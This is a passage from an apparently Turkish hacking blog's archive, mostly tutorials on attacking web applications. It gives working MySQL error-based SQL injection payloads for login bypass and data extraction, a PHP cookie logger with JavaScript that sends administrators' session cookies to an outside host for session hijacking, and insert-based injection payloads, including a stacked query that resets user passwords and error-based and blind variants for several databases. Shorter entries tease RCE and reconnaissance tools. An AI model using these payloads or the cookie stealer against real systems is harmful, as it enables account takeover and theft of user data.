7 Aralık 2017 Perşembe

Mysql Error Based İnjection


Bu yazımda extractvalue error based ile login bölümünden sql injection yapacağız.


Yukarıda gördüğünüz gibi normal bir login giriş bölümü şimdi rastgele birşeyler girelim.
Resimde gördüğünüz gibi hata verdi sql sorgumuzu inceleyelim;
select * from uyeler where username='asd' and password='asd'

şimdi bir de kullanıcı adı bölümüne: '=' 'or' ile deniyelim.
select * from uyeler where username=''=' 'or' ' and password=''=' 'or' '
yukarıdaki sorgudan anlaşılacağı gibi  username='' deki ve password='' deki
tırnakları aşmış sorguyu değiştirmiş oluyoruz böylece true dönüyor ve login oluyoruz.Şimdi gelelim extractvalue ile veri çekmeye;
Kullanıcı adı bölümüne : a'and extractvalue(0x1,concat(0x1,(select database())))-- basit bir sorgu ile database adını çekmeyi deniyeceğiz şifre bölümüne ise ' tek tırnak koymanız yeterli -- ifadesi sorguyu kapatacağı için ' tırnak ile true döndüreceğiz sorguyu
select * from uyeler where username=a'and extractvalue(0x1,concat(0x1,(select database())))--' and password=' ve sonuçlara bakalım gördüğünüz gibi database adı geldi.


gördüğünüz gibi database adı geldi. Şimdi kolonları çekelim;

and extractvalue(0x1,concat(0x1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))-- yazıyoruz;şimdi tek tek limitimizi değiştirip tek tek sorguları ekrana yazdırıyoruz.

and extractvalue(0x1,concat(0x1,(select column_name from information_schema.columns where table_schema=database() and table_name='uyeler' limit 0,1)))--
Not:Eğer -- veya # sorgu sonlandırılmıyorsa sorgunun sonuna and'1 ekleyerek de sorgunun syntax hatasız çalışması sağlanır.üyeler tablosundakileri listeledik id , username , password var benim işimi yarıcak iki veri var username ve password şimdi sorgumuzu ona göre yazıp username ve password daki verileri ekrana yazdıracağız ve sonuç alttaki resimde olduğu gibi eğer veritabanında birden çok veri varsa limiti değiştirip çekebilirsiniz.

Not: Extravalue toplam 32 karakter döndürür daha fazlasını okumak için substring kullanılır.
Örnek Sorgu:'and 1=extravalue(null,concat(0x3a,(select substring(table_name,32,32) from information_schema.tables where table_schema=database() limit 1 offset 0)))

İyi günler.

24 Ekim 2017 Salı

Xss Session Hijacking Uygulama Örneği

Bu yazımızda basit bir iletişim forumundan ek bir güvenlik ve kontrol olmadan veri gönderimini kullanarak Xss Session Hijacking saldırısı düzenlemeyi anlatacağım. Yukarıda bir iletişim formu var şimdi buradaki inputlara ve textarea'ya verileri giriyoruz ve tamperdata,burpsuite gibi araçlarla yakalayıp veriyi değiştireceğiz.


Verilerimiz gördüğünüz gibi şimdi bu verilere cookie loglayacağımız için loggerimizin adresini yazıyoruz.
Php Kodu
<?php
error_reporting(0);
$cookie=$_GET["cookie"];
$date=date("l ds of F Y h:i:s A");
$user_agent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('lob.txt','a'); // chmod 777 lob.txt
fwrite($file,"TARIH:$date || USER AGENT:$user_agent || COOKIE:$cookie \n");
fclose($file);
?>
Javascript Kodu
i=new/**/Image();i.src='http://siteadi.com/log.php?cookie='+document.cookie+'////log adres/////:::'+document.location;
Yukarıdaki kodlar ile basit bir log aracı elde etmiş olduk şimdi verilerimizi loglayacağımız şekilde gönderiyoruz.


Neden İsimin olduğu bölüme ve mesaj içerik bölümüne js kodunu ekledik çünkü genelde yönetim panellerinde tablolarda mesaj bölümünde isim soy isim ve mesajın kısaltımı substr olarak ayarlanıp echo ile bastırılır ekrana.

 Gönderdik verimizi ve adminimiz giriş yaptı
 Yönetim panelindeki anasayfada mesajımız geldi. Log dosyamıza bakıyoruz


Yöneticinin cookilerini elde etmiş bulunuyoruz ve ardından yöneticiden aldığımız cookileri kendi cookielerimizle değiştirip login olacağız ilk önce cookie manager plugini ile kendi cookiemizi seçiyoruz
Resimde görüldüğü gibi login değiliz yöneticiden aldığımız cookieleri kendi cookielerimizle yer değiştiriyoruz.

Değiştirdik ve cookie logger aracımız ile log yolunu (http://localhost/portal/admin-21-/anasayfa.php) direk url bölümüne yapıştırdık ve loginiz.


17 Ekim 2015 Cumartesi

Insert bazlı Query'lerde SQL Injection

Bu yazımızda temelde insert cümlesi kullanan web sayfalarında SQL Injection saldırısı düzenlemeyi anlatacağım.

Insert cümlesi kullanan sayfalara örnek verecek olursak en güzel örnek register formları olacaktır. Bu yazımda kendi kodladığım bir register formunda SQL Injection yapacağım.

Formun PHP kodu aşağıdaki gibidir;


Kodumuz kullanıcıdan kadi, ad, soyad, email alarak register işlemi gerçekleştirmektedir. Bu verileri kullanıcı tablosuna insert etmektedir.

Formun görünümü aşağıdaki gibidir;


Verileri girip kaydol dediğinizde "Kayıt eklendi" demektedir.

Biz tırnak işareti kullanarak kayıt ekledik ve aldığımız yanıt şu şekildedir:


Tırnak işaretini bir değil 2 tane peş peşe koyarsak, veritabanı standartlarında escape edilerek string olarak tırnak işaretine dönüştürülecektir. Özel karakter olarak işlev görmeyecektir. Bu şekilde bir deneme yapalım:

Veritabanına nasıl eklendiğine bakalım:


Gördüğümüz gibi tırnak işareti kayıt metnine direk yansıdı, sorguyu bozmadı.

Bizim injection çektiğimiz kolon email kolonuydu. Şimdi biz mevcut insert cümlesini sonlandırmaya çalışacağız. Önce sorgunun orjinalinde işin nasıl gerçekleştiğine bakalım:

INSERT INTO kullanici (id,kadi, ad,soyad, email)VALUES (null, '".$_POST['kadi']."', '".$_POST['ad']."','".$_POST['soyad']."','".$_POST['email']."')

burada örneğin "kadi=asd&ad=asd&soyad=asd&email=asd@asd.com" yazmış olsaydık sorgu şu şekilde olacaktı;

INSERT INTO kullanici (id,kadi, ad,soyad, email)VALUES (null, 'asd','asd','asd','asd@asd.com')

Biz email kısmına ')-- girdiğimizde sorgu şu şekilde olacak;

INSERT INTO kullanici (id,kadi, ad,soyad, email)VALUES (null, 'asd','asd','asd','')--)

Mantıken baktığımızda emaile boş insert yapmış olacağız ancak deneme yaptığımızda kayıt eklenemedi. Bu sebeple biz sorgu sonlandırma karakteri olarak # karakterini kullanacağız. Mysql de bu karakterle de sorgu sonlandırmak mümkün. -- karakterleri ile mysql de bazen sonlandırma yapamıyoruz(bazen versiondan bazen de scriptte alınan önlemlerden kaynaklanmakta) ama diğer db'lerde sonlandırma yapabileceğimiz için onu da göstermiş olalım. Şimdi girdi olarak

')#

giriyoruz, aldığımız tepki aşağıdaki gibidir;

Bu arada veritabanı türlerine göre query sonlandırma karakterleri aşağıdaki gibidir;

Mysql:   -- ,  #
Oracle:  --
MsSQL: --, % 00(null byte)
Access% 00 (null byte)
PostgreSQL: --, % 00 (null byte)

SQLite: --, /*, % 00 (null byte)

IIS server kullanılıyorsa zaten yüksek ihtimalle % 00 tüm db'lerde çalışır. (Not: % 00 arasında boşluk olmayacak.)

Gördüğünüz gibi kayıt eklendi. Email kısmını boş olarak eklemiş olmamız lazım. Bunun için db'mizi kontrol edelim.Evet 12 ve 13 id li kayıtlar boş email olarak denemelerimiz sırasında eklenmiş oldu.

Eğer email kolonumuzdan sonra başka kolonlarda insert ediliyor olsaydı, kayıt başarıyla eklendi uyarısı alana kadar aşağıdaki gibi denemeler yapacaktık.

','')#
','','')#
','','','')#

Peki mevcut query'yi sonlandıramasaydık ne yapacaktık?

O zaman 2 veri insert edermiş gibi query'yi tamamlamaya çalışacaktık. Önce insertte kaç kolon var onu tahmin etmemiz gerekecekti, daha sonra ilk insert cümlesini tamamlayıp 2. cümleyi açacaktık. Örnek vermek gerekirse, eğer 4 kolon olduğunu düşünseydik şu şekilde denemeler yapacaktık:

'),('','','','
',''),('','','
','',''),('','
','','',''),('

Burada amaç ilk query'yi tamamlayıp, 2. query'de sonuna eklenecek karakterlere göre hata vermeyip sorguyu tamamlayacak bir query üretmektir.

Örneğin ilk deneme doğruysa, son query şu şekilde olacaktır:

insert into bla values('bla','bla','bla',''),('','','','')

Tabi biz burda boş girdileri insert etmiş olduk. Boş olmama kuralı veya veri türü uyuşmazlıkları ihtimaline karşın aşağıdaki gibi bir girdi kullanmak daha akıllıca olur.

insert into bla values('bla','bla','bla',''),('2','2','2','2')

Şimdi biz istediğimiz veriyi ekliyoruz. Peki, başka neler yapabiliriz?

Burada önemli olan soru şudur, hangi veritabanı kullanılıyor?

Eğer kullanılan dbms "mssql" veya "postgresql" ise, "stacked query" desteğimiz var demektir. Bu da sorgu tipi insert olsa bile sonuna istediğimiz sorguyu ekleyebileceğimiz manasına gelir.

Örneğin şöyle bir saldırı kodu düşünelim;

');update users set password='12345' where username not in ('

Sorgunun son hali şöyle olacak:

insert into bla values('bla','bla','bla','');update users set password='12345' where username not in ('')

Burada hem insert query'si çalışacak, hem bizim update query'miz çalışacaktır.

Ancak dbms Oracle, Mysql, Access, Sqlite vb. ise sadece insert olan kısma müdahale edebiliriz.
Peki nasıl veri çekeriz?

Burada da aklımıza şöyle bir soru gelir, insert edilen verileri görebiliyor muyuz?

Eğer verileri görebiliyorsak email'e şöyle bir şey yazdığımızı düşünün:

asasd'),('','',version(),'','17 id'li kayıt dikkatinizi çekmiştir herhalde ;)

Eğer insert tablosundaki verileri göremiyorsak, o zaman ne yapabiliriz?

Burada da bir soru sormak gerekir, db hataları detaylı bir şekilde ekrana yansıyor mu?

Eğer yansıyorsa Hata Bazlı Reflected Injection yapabiliriz. Bu çeşit bir saldırı için örnek kodlar aşağıdadır;

Mysql için:

asasd'),('','',extractvalue(rand(),concat(0x3a,version(),0x3a,user())),'','

veya 

asasd'),('','',(select 1 from(select count(*),concat((select table_name from information_schema.tables limit+0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),'','PostgreSQL için:

asasd'),('','',(select cast(current_user as int)),'','Mssql için:

asasd'),('','',(select top 1 cast(name as int) from sysobjects),'','Oracle için:

asasd'),('','',(select XMLType((‘<:’||user||’>’)) from dual),'','


Bu yazdığımız özel sorgular, hata mesajında bize istediğimiz veriyi verecektir.

Ancak bizim kodumuz hataları ekrana vermemekteydi. Blind injection yapmaktan başka şansımız kalmadı. Peki nasıl yaparız?

Burada biz neyi biliyoruz? Eğer iç sunucu hatası veren bir sorgu girilirse, "kayıt eklenemedi" ile karşılaşacağız.

O zaman biz de yazdığımız sorgu sonucu "true" çıktığında iç sunucu hatası verecek bir sorgu yazarız.

Örnek saldırı kodu aşağıdadır.

asasd'),('','',IF((select 1 from information_schema.tables where table_schema=database() and table_name like '%admin%'),(select 1 union select 2),1),'','


IF((select 1 from information_schema.tables where table_schema=database() and table_name like '%admin%'),(select 1 union select 2),1)

Eğer information_schema.tables'ta mevcut db'mizde, like '%admin%' şartını sağlayan bir tablo varsa, (select 1 union select 2), yoksa sadece 1 dönecektir.

True şartı sağlandığında (select 1 union select 2) - 2 elemanlı bir rowset döndüreceği için, syntaxa uygun olacak fakat, iç sunucu hatası verdirecektir.


Bu da içinde admin geçen bir tablomuz olduğu manasına gelir. Bu saldırı şekli Mysql'de kullanılır, çünkü Mysql'de tür dönüşümü uyumsuzlukları(int-char vb) ile iç sunucu hataları alınmamaktadır. Yine de başka türlü blind injection saldırıları da üretmek mümkündür.


Hee bu arada, Time Based Injection da yapılabilir ancak burada ihtiyaç yoktur. Zaten tespit edemediğimizde bu yönteme başvurmamız gerekir. Çünkü hiçbir denemede sayfadan bir tepki alamıyorsak; sayfaya yansımayan, ancak arka planda tetiklenme ihtimali olan injection'lar için Time Based denemeleri yapmak gerekir.


Insert bazlı query'ler bu şekilde inject edilebilmektedir. Bu tür insert cümleleri gösterdiğimiz gibi kayıt formları olabileceği gibi, veritabanı üzerine log tutan her yerde olabilir. Çünkü log mekanizması doğası gereği insert kullanmaktadır.  Özel karakterler escape edilmemiş HER QUERY inject edilebilir, etmesini bilene ;)

22 Eylül 2015 Salı

Remote Command Execution (RCE)

Bu güvenlik açığı tüm türler arasında en tehlikelisidir ve genelde 10 üzerinden 10 ile derecelendirilir. Bulmak zordur. Komut çalıştırma açığı aranan scriptte, komut çalıştıran bi kod parçası olması gerekir haliyle. Bu yüzden bulmak zordur, çünkü çok gerekmedikçe webmasterlar kolay kolay komut çalıştıran kodlar yazmaz. Ancak her sistemin her katmanında bu tip açıklara rastlanabilir. Biz burada web hacking'deki mevzusundan bahsedeceğiz.

2 Ağustos 2015 Pazar

Tırnak Işareti Filtreli Scriptlerde SQL Injection, htmlspecialchars Bypass

Bildiğiniz gibi Ahmet Çelik(t4cs1zkr4L) kardeşim Avrasya Üniversitesi Bilişim Topluluğunun başkanlığını yürütmekte. Topluluğun dergi çıkarmasına öncülük eden laz bana da bi makale yazdırdı. Onu sizinle paylaşayım dedim.

Bunlar da dergiden resimler:

25 Temmuz 2015 Cumartesi

TurkSec Bingci

Dün bişey kodladım, yayınlayayım dedim.

Ne kodladım?
Bingci

Neyde kodladım?
Java JRE 8

Napar?
Bing'de bilenleriniz vardır ip bazlı arama yapmak mümkün. Örneğin şöyle yazarsanız;
ip:123.123.123.123
O ip adresinde mevcut yayında olan siteleri listeler. Peki ne işimize yarar?

22 Temmuz 2015 Çarşamba

Hack Terimleri, Hack Nedir? Hacker Nedir?

Bu yazımızda teknik bilgiden daha çok bilgi güvenliğinin en çok tartışılan terimleri hakkında bilgi vereceğiz. Burada amacımız kendi tecrübelerimize dayanarak, bazı yanlış bilinen tanımların doğrularını açıklamaya çalışmak. Tanımların tamamı bize aittir fakat, bu tanımlamaları yaparken, aynı zamanda dünyadaki emsallerini de göz önünde bulunduracağız. Yani tamamı fikir olmayacak, kabul edilmiş tanımlamalar da olacaktır.
1 Temmuz 2015 Çarşamba

TurkSec Panel Bulucu

Evet arkadaşlar bildiğiniz gibi Java'da TurkSec Scanner'ı kodlamaya devam etmekteyiz. Biraz dağınık kodladığım için ve her gün yeni bir şeyler eklediğim için program bütün olarak daha tamamlanmış değil; ancak biten bazı modülleri ayrı programlar halinde yayınlamaya karar verdik.

Özellikle Ahmet'in proje dersi için geliştirdiğimiz bu modülü ayrı programa çevirerek yayınlamak istedik.

Yayınlayacağımız modül, dizin bulma(dir finder) modülü.